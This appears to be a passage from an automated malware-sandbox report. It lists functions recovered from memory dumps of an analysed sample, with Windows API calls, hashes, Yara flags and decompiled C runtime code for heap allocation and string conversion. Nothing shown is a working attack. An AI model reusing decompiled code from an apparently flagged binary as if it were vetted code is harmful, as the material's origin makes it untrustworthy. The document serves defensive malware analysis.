Instruction ID: 2f43f4a9815aac1d29bd1c218f7caca3779a0aad3522634aa20d25f490d70f03
Opcode Fuzzy Hash: c8ac8ba9153295e93241444fca4506b46e6911bc7ae79a3357425c906f17ab37
Instruction Fuzzy Hash: A35100B1C00209AFDF11CF99D884ADEBFB5FF48314F24816AE919AB220D771A945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 04D6FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04D6FD0A

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 3363dfee1130e218f7f5013dd89fbe4bc0450c340712c65d28ddb3dde949c48c
Instruction ID: 8b44b7faa4b3c52ef8b458f38d230611afdac4dec023e0cf86bcf6b94fe20533
Opcode Fuzzy Hash: 3363dfee1130e218f7f5013dd89fbe4bc0450c340712c65d28ddb3dde949c48c
Instruction Fuzzy Hash: 6141B0B1D00309EFDB14CF99D984ADEBBB5BF48354F24812AE819AB210D774A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 050645F5, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 050646B1

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3eab7b37bd975b7bf81f5efb175c6f753b8da6e75d2ec62e7ab92283f587655d
Instruction ID: c73340de9f44916cc184ee975d0432c53a2f8bf20b969af147bbf457c5f39291
Opcode Fuzzy Hash: 3eab7b37bd975b7bf81f5efb175c6f753b8da6e75d2ec62e7ab92283f587655d
Instruction Fuzzy Hash: 3441F1B1C04618CBDF24CFA9C9887DEBBF1BF89304F20805AD409AB250DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05063474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 050646B1

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: ad33ce408f4defc71f4f75e84acabda8acee787a063f1423374212a2f8196604
Instruction ID: 06594c0fc5f51ac926e03f541bdff66ec38fca044b0a73f7b5c788a770f6a831
Opcode Fuzzy Hash: ad33ce408f4defc71f4f75e84acabda8acee787a063f1423374212a2f8196604
Instruction Fuzzy Hash: FB41F2B0D0461CCBDB24CFA9D98879EBBF5BF89304F208069D409BB250DB75A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 05062470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 05062531

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 61f11beb688625f5be784a34a00461ccd1f42e8223bf112e48cb3eeb981cfdce
Instruction ID: 1a26f666c52353111064b43171f3caeecfd3dbdd8037f351d4c829f4ebd7a4c4
Opcode Fuzzy Hash: 61f11beb688625f5be784a34a00461ccd1f42e8223bf112e48cb3eeb981cfdce
Instruction Fuzzy Hash: E34129B8A00205CFDB14CF99D448AAEBBF6FB88314F15C459D919AB361D774E841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0506B889, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0506B957

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: c212e5038203e86228431e90226440a0853ef5dd5a8ee7bf041f4fb706a30c61
Instruction ID: 0611b8e2a4b81e54829d19b621ffb58092d73e7b167452dc475f99e2069359a3
Opcode Fuzzy Hash: c212e5038203e86228431e90226440a0853ef5dd5a8ee7bf041f4fb706a30c61
Instruction Fuzzy Hash: CD318CB2904249AFDB11CFA9D804BDEBFF4EF59310F04805AE954A7261C335D950DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D6FE0B, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 04D6FE9D

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 58ceb2593ac2c1f8c21dd21a19b6ea7edd41110837b3c2e8d61640f70fb88abf
Instruction ID: b02aadcb45b8e74329a9c83bc4d9a0d7757a436a7a19848871e8a2a87afe26e8
Opcode Fuzzy Hash: 58ceb2593ac2c1f8c21dd21a19b6ea7edd41110837b3c2e8d61640f70fb88abf
Instruction Fuzzy Hash: 802189B5800209DFDB10DF95E949BCABFF4FB48324F04855AE825B7252C335A904CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D6BCF8, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04D6BD87

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: fcba445fb0fc5fcc97e8c063e367c5f5d4ac4531e6d5a4eda8f1963cdaffe481
Instruction ID: 1ee715a626fe3d42a6d5c445417f77f3ac5d557a3fc9a9cde0a20135e7338c59
Opcode Fuzzy Hash: fcba445fb0fc5fcc97e8c063e367c5f5d4ac4531e6d5a4eda8f1963cdaffe481
Instruction Fuzzy Hash: 152105B5D002089FDB10CFA9D584ADEFBF4FB48324F14851AE965A7350D374A941CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D6BD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04D6BD87

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 60a497338ebf20dc4f4d34069911f0bc7e73863ed0245fd2e7e72fa1805a9c9b
Instruction ID: 43a7593733a33a846c4c649a3212e74da6bb1420ed8254d6ca5b5725b41bace9
Opcode Fuzzy Hash: 60a497338ebf20dc4f4d34069911f0bc7e73863ed0245fd2e7e72fa1805a9c9b
Instruction Fuzzy Hash: 4B21C4B5900219DFDB10CFA9D584ADEFBF4FB48324F14841AE955A7350D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D68768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04D696A9,00000800,00000000,00000000), ref: 04D698BA

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0f71620cdc2f280116bf70f4301008907ae1ef6c478e750df2406bbcc6bad6ef
Instruction ID: 21dda18ac1e4e93aa07be564fb30c93b5291107ad7d3c35c15210acb568f6ae6
Opcode Fuzzy Hash: 0f71620cdc2f280116bf70f4301008907ae1ef6c478e750df2406bbcc6bad6ef
Instruction Fuzzy Hash: 6311F2B59002099FDB10CF9AC548B9EFBF4AB48324F10846ED91AB7600C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04D67EE9, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(0000004B), ref: 04D67F5D

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: a41ecf18364cc8c21adb506475c7f9ad34bf9aac78b7d11e65c6adcd8835eb9c
Instruction ID: 2ee2eddd8cabcaa2796eb1a00d3e6a3d1b40f49a62a4eb2a933f5257dde9e241
Opcode Fuzzy Hash: a41ecf18364cc8c21adb506475c7f9ad34bf9aac78b7d11e65c6adcd8835eb9c
Instruction Fuzzy Hash: 8A11DFB1C043998FDB11CFA5D1443DABFF4EB09328F04849ED495A7282C7389645CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 04D69849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04D696A9,00000800,00000000,00000000), ref: 04D698BA

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6a94c3d2b72300c046da142d8307209954d1eded4b08b3c8e6bedcd9d4b78cd8
Instruction ID: 758f9b2bb9ec14e3ca0a1bde91e4e324e4bf608df6809b9416e5f8e9b5f50aa3
Opcode Fuzzy Hash: 6a94c3d2b72300c046da142d8307209954d1eded4b08b3c8e6bedcd9d4b78cd8
Instruction Fuzzy Hash: 241114B6C002099FDB10CFAAC444BDEFBF4EB48324F10856ED829A7250C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0506B8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 0506B957

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: e07a7c5ca9065a54498816c0458c3d2a238834a9b5e24197a01370bddd2443f8
Instruction ID: 3c2858c6b903e2808f88715578dc35b2a853eef6bf3f2ed1215fdebe3715b744
Opcode Fuzzy Hash: e07a7c5ca9065a54498816c0458c3d2a238834a9b5e24197a01370bddd2443f8
Instruction Fuzzy Hash: 091134B5800249DFDB10CFAAD944BDEBFF8EB48364F14841AE955A3210C379A954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0506E6D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,021353E8,00000000,?), ref: 0506E73D

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 631a49ca375ee660040700b825fdbf1475c00a7a41bec7e32a036811c87b0cfb
Instruction ID: 9e954bef0ef6c266328015828eb289730b07640925681214c0d9064971530e6b
Opcode Fuzzy Hash: 631a49ca375ee660040700b825fdbf1475c00a7a41bec7e32a036811c87b0cfb
Instruction Fuzzy Hash: A01116B58003099FDB10CF99D985BDEBBF8FB48324F10845AE954A3250D378AA44CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 050632D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,021353E8,00000000,?), ref: 0506E73D

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: c5557216cc695863c2d49700a74add7b82cf4bf2f3ee341aed38c2a954ff4473
Instruction ID: 53b3e3ab624010c55cec4353273a7fcf8046adf7f6cb7defed8183ffd1cdfde0
Opcode Fuzzy Hash: c5557216cc695863c2d49700a74add7b82cf4bf2f3ee341aed38c2a954ff4473
Instruction Fuzzy Hash: 8A1128B58003099FDB10CF99D549BEEFBF8FB48364F10845AE954A3250D378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0506D238, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000018,00000001,?), ref: 0506D29D

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 01fec669c3e3c125b742b789f18ad7b48e8be6fa835ade524722c08d0224f377
Instruction ID: d932ff25f07ab95af7e652dfac787902945e725ebb2efa3e07e196942066caee
Opcode Fuzzy Hash: 01fec669c3e3c125b742b789f18ad7b48e8be6fa835ade524722c08d0224f377
Instruction Fuzzy Hash: 0811F2B58002099FDB10CF99D989BDEBFF8FB58324F10841AE815B7650C378AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D695C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 04D6962E

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: c10ee0a086bf135d8e36fd343341b1e0b0d1b51c4506b1e91dbd9e2291034a25
Instruction ID: c0a34c5a69113d4ad31f1f0412d4416e997b54a1d3c09d881078761612dd249f
Opcode Fuzzy Hash: c10ee0a086bf135d8e36fd343341b1e0b0d1b51c4506b1e91dbd9e2291034a25
Instruction Fuzzy Hash: 5C11E0B5C003498FDB10CF9AC444BDEFBF4AB89324F10855AD829B7610C379A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05061540, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0506226A,?,00000000,?), ref: 0506C435

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 46b7086406ac34e406e4734788c52713115ae10bc94612b27b1dd086b6e2ef2a
Instruction ID: a309e2f267e8d5fcf5c860d3b8af6e5123979a578ec184ff1f2982094185f662
Opcode Fuzzy Hash: 46b7086406ac34e406e4734788c52713115ae10bc94612b27b1dd086b6e2ef2a
Instruction Fuzzy Hash: 831125B58002489FDB10CF99D548BEEBBF8FB48324F10841AE855B3200C374A940CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0506A548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0506BCBD

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 94d72594049f3aa7a5e7f4ecbcb07977fa8b00eaae8d9db5d9bb2278ee582847
Instruction ID: 0396c79f8798bcbf763f52e5ab7bd278805144860bd0834ed7731c54a862ed6a
Opcode Fuzzy Hash: 94d72594049f3aa7a5e7f4ecbcb07977fa8b00eaae8d9db5d9bb2278ee582847
Instruction Fuzzy Hash: 5C11F2B5800249DFDB20CF99D589BDEBBF8FB48324F10845AE955B7250C375AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 050650D4, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000018,00000001,?), ref: 0506D29D

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 804b1a12b3977205ef94fbcbb432bc934008257993236708b8134e5ef34b2861
Instruction ID: 4c307ce9cb87d6a7f4e6ff2cb73add49ae789a9cbb5fc857984ff2bb3aa7540c
Opcode Fuzzy Hash: 804b1a12b3977205ef94fbcbb432bc934008257993236708b8134e5ef34b2861
Instruction Fuzzy Hash: 5E1103B59002099FDB10CF9AD588BDEFBF8FB58324F10845AE915B7240C375A984CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0506C3D0, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,0506226A,?,00000000,?), ref: 0506C435

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 363305fb478fcb79915e05d4c8373c17c1ae1f4d79508200313ddad2c3a1f195
Instruction ID: 145274800073fa98e3975e2a549bf0aca9dd84680cfcf201e8c693732dd5e17a
Opcode Fuzzy Hash: 363305fb478fcb79915e05d4c8373c17c1ae1f4d79508200313ddad2c3a1f195
Instruction Fuzzy Hash: F211F5B58002499FDB10CF99D585BDEBFF8FB48324F10841AE855A7600C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0506BC59, Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0506BCBD

Memory Dump Source

Source File: 0000000C.00000002.285162526.0000000005060000.00000040.00000001.sdmp, Offset: 05060000, based on PE: false

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b6a52d69236ffa6242558e524c0b2530e0d8ed311b5abb025a2447665b779063
Instruction ID: 51ffa52576a75b0ec05416398d9f9a1ccc12433ffc5481176e5e97968c2634fb
Opcode Fuzzy Hash: b6a52d69236ffa6242558e524c0b2530e0d8ed311b5abb025a2447665b779063
Instruction Fuzzy Hash: 511103B98002499FDB20CF99D589BDEFBF8FB48320F10841AD919A7600C374AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04D6FE40, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 04D6FE9D

Memory Dump Source

Source File: 0000000C.00000002.284609810.0000000004D60000.00000040.00000001.sdmp, Offset: 04D60000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: f146c855b19b932adb1e368a9f8087e947fb49eed37eff322b4712ad11ba6cc5
Instruction ID: a27110a76cf8293e879eb9098815ef773468e31b0ec4081539cfb598316b472e
Opcode Fuzzy Hash: f146c855b19b932adb1e368a9f8087e947fb49eed37eff322b4712ad11ba6cc5
Instruction Fuzzy Hash: 1011D0B58002499FDB10CF99D589BDEFBF8EB48324F10855AE959A7341C378A944CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00403E3D, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00403E3D(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E00404831())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E00403829();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E004068FD(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x6635e7d3
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080D8(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
__alloca_probe_16.LIBCMT ref: 00407961
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
__alloca_probe_16.LIBCMT ref: 00407A46
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
__freea.LIBCMT ref: 00407AB6

Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F

__freea.LIBCMT ref: 00407ABF
__freea.LIBCMT ref: 00407AE4

Memory Dump Source

Source File: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00408223, Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				void* __ebx;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t93;
				long _t96;
				void _t104;
				void* _t111;
				signed int _t115;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t136;
				signed int _t138;
				void* _t139;

				_t78 =  *0x412014; // 0x6635e7d3
				_v8 = _t78 ^ _t138;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t115 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t136 = _a4;
				_v60 = _t86;
				 *_t136 = 0;
				 *((intOrPtr*)(_t136 + 4)) = 0;
				 *((intOrPtr*)(_t136 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
					_t123 =  *(_t129 + _t115 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
							} else {
								_t111 = E00407222( &_v28, _t133, 2);
								_t139 = _t139 + 0xc;
								if(_t111 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
						_push(2);
						_v15 = _t128;
